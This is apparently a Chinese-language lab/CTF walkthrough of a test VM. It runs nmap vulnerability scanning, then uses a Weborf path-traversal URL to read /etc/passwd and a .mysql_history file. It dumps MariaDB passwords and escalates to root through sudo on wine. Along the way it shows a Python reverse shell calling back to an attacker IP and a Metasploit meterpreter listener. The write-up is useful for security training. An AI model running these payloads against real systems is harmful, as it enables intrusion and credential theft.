一、主机发现
使用netdiscover
发现目标IP为192.168.203.140
。
二、端口探测
root@kali:~# nmap -sS -A 192.168.203.140 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 17:51 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.140
Host is up (0.00039s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.203.140:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.203.140:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
3306/tcp open mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| NULL:
|_ Host '192.168.203.129' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum:
| /../../../../../../../../../../etc/passwd: Possible path traversal in URI
| /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_ /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.80%I=7%D=2/21%Time=5E4FA832%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4E,"J\0\0\x01\xffj\x04Host\x20'192\.168\.203\.129'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.80%I=7%D=2/21%Time=5E4FA837%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,187,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\
SF:nContent-Length:\x20326\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Weborf</
SF:title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><
SF:tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20href=
SF:\"html/\">html/</a></td><td>-</td></tr>\n</table><p>Generated\x20by\x20
SF:Weborf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(HTTPOptions,B2,"
SF:HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET
SF:,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV
SF::\x20<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n
SF:\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU
SF:/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,M
SF:OVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/fs/1>\r\n
SF:MS-Author-Via:\x20DAV\r\n\r\n")%r(FourOhFourRequest,12B,"HTTP/1\.1\x204
SF:04\x20Page\x20not\x20found:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Lengt
SF:h:\x20202\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head
SF:><title>Weborf</title></head><body>\x20<H1>Error\x20404</H1>Page\x20not
SF:\x20found\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p>
SF:</body></html>")%r(Socks5,125,"HTTP/1\.1\x20400\x20Bad\x20request:\x20W
SF:eborf\x20\(GNU/Linux\)\r\nContent-Length:\x20199\r\nContent-Type:\x20te
SF:xt/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x20
SF:4\.01\x20Transitional//EN\"><html><head><title>Weborf</title></head><bo
SF:dy>\x20<H1>Error\x20400</H1>Bad\x20request\x20<p>Generated\x20by\x20Web
SF:orf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(SIPOptions,B2,"HTTP
SF:/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POS
SF:T,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x2
SF:0<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n
SF:");
MAC Address: 00:0C:29:0F:49:BE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.203.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.33 seconds
我说这次探测的时间咋这么长,原来是发现了一些不得了的东西。
开放的端口有22
、80
、3306
、8080
。
三、漏洞利用
查看了80
端口,就是一个简单的目录遍历。
我们还是直接查看8080
端口,根据扫描的结果来看是存在任意文件读取的。
http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
这里我们要对斜杠进行url编码,否则不生效。
可以看到成功读取。
此漏洞呢,是weborf
的一个目录遍历漏洞
原文地址:http://www.gltc.cn/31328.html
在读取到的/etc/passwd
中,我们看到了用户weborf所在的目录,我们进行访问:
http://192.168.203.140:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f
利用dirb
尝试对目录进行扫描:
果然发现了点好东西:
.mysql_history
是数据库的账号和密码:
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';
尝试是否可以连接ssh:
使用平常一系列提权操作查看,并没有发现可以利用的提权点,最终选择进入mysql:
MariaDB [(none)]> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
| user |
+---------------------------+
31 rows in set (0.001 sec)
MariaDB [mysql]> describe user;
+------------------------+-----------------------------------+------+-----+----------+-------+
| Field | Type | Null | Key | Default | Extra |
+------------------------+-----------------------------------+------+-----+----------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(80) | NO | PRI | | |
| Password | char(41) | NO | | | |
| Select_priv | enum('N','Y') | NO | | N | |
| Insert_priv | enum('N','Y') | NO | | N | |
| Update_priv | enum('N','Y') | NO | | N | |
| Delete_priv | enum('N','Y') | NO | | N | |
| Create_priv | enum('N','Y') | NO | | N | |
| Drop_priv | enum('N','Y') | NO | | N | |
| Reload_priv | enum('N','Y') | NO | | N | |
| Shutdown_priv | enum('N','Y') | NO | | N | |
| Process_priv | enum('N','Y') | NO | | N | |
| File_priv | enum('N','Y') | NO | | N | |
| Grant_priv | enum('N','Y') | NO | | N | |
| References_priv | enum('N','Y') | NO | | N | |
| Index_priv | enum('N','Y') | NO | | N | |
| Alter_priv | enum('N','Y') | NO | | N | |
| Show_db_priv | enum('N','Y') | NO | | N | |
| Super_priv | enum('N','Y') | NO | | N | |
| Create_tmp_table_priv | enum('N','Y') | NO | | N | |
| Lock_tables_priv | enum('N','Y') | NO | | N | |
| Execute_priv | enum('N','Y') | NO | | N | |
| Repl_slave_priv | enum('N','Y') | NO | | N | |
| Repl_client_priv | enum('N','Y') | NO | | N | |
| Create_view_priv | enum('N','Y') | NO | | N | |
| Show_view_priv | enum('N','Y') | NO | | N | |
| Create_routine_priv | enum('N','Y') | NO | | N | |
| Alter_routine_priv | enum('N','Y') | NO | | N | |
| Create_user_priv | enum('N','Y') | NO | | N | |
| Event_priv | enum('N','Y') | NO | | N | |
| Trigger_priv | enum('N','Y') | NO | | N | |
| Create_tablespace_priv | enum('N','Y') | NO | | N | |
| Delete_history_priv | enum('N','Y') | NO | | N | |
| ssl_type | enum('','ANY','X509','SPECIFIED') | NO | | | |
| ssl_cipher | blob | NO | | NULL | |
| x509_issuer | blob | NO | | NULL | |
| x509_subject | blob | NO | | NULL | |
| max_questions | int(11) unsigned | NO | | 0 | |
| max_updates | int(11) unsigned | NO | | 0 | |
| max_connections | int(11) unsigned | NO | | 0 | |
| max_user_connections | int(11) | NO | | 0 | |
| plugin | char(64) | NO | | | |
| authentication_string | text | NO | | NULL | |
| password_expired | enum('N','Y') | NO | | N | |
| is_role | enum('N','Y') | NO | | N | |
| default_role | char(80) | NO | | | |
| max_statement_time | decimal(12,6) | NO | | 0.000000 | |
+------------------------+-----------------------------------+------+-----+----------+-------+
47 rows in set (0.002 sec)
MariaDB [mysql]> select User,Password from user;
+---------+-------------------------------------------+
| User | Password |
+---------+-------------------------------------------+
| root | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades |
| weborf | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+
3 rows in set (0.001 sec)
四、提权
我们得到了sunrise的账号和明文密码,root账户的密码带了加密,暂不清楚是什么加密,我们先登录账号看一下。
使用sudo -l
,发现可以使用此账号运行root权限的wine
。
wine
介绍:
Wine (“Wine Is Not an Emulator” 的递归缩写)是一个能够在多种 POSIX-compliant 操作系统(诸如 Linux,Mac OSX 及 BSD 等)上运行 Windows 应用的兼容层。
这里就很好理解了,使用wine运行一个exe木马,得到反弹shell的效果。我本来想通过pyinstaller
封装一个py脚本的exe木马,但是我利用python写的脚本转换成exe之后,无法正常运行
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.203.129",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
我也不清楚是怎么回事,希望有明白的大佬能够给我解释一下,谢谢!
我还是老老实实的使用msf吧。
可以看到生成了两个文件,一个是exe文件,一个是.rc
说明文档。
我们先查看一下说明文档:
我们在msf中,根据说明文档进行配置,开启监听:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.203.129
lhost => 192.168.203.129
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > set enablestageencoding true
enablestageencoding => true
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.203.129:443
接下来,将exe
木马传到目标机器上。
kali开启web服务:
root@kali:~# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
我们可以看到现在已经拿到了root权限。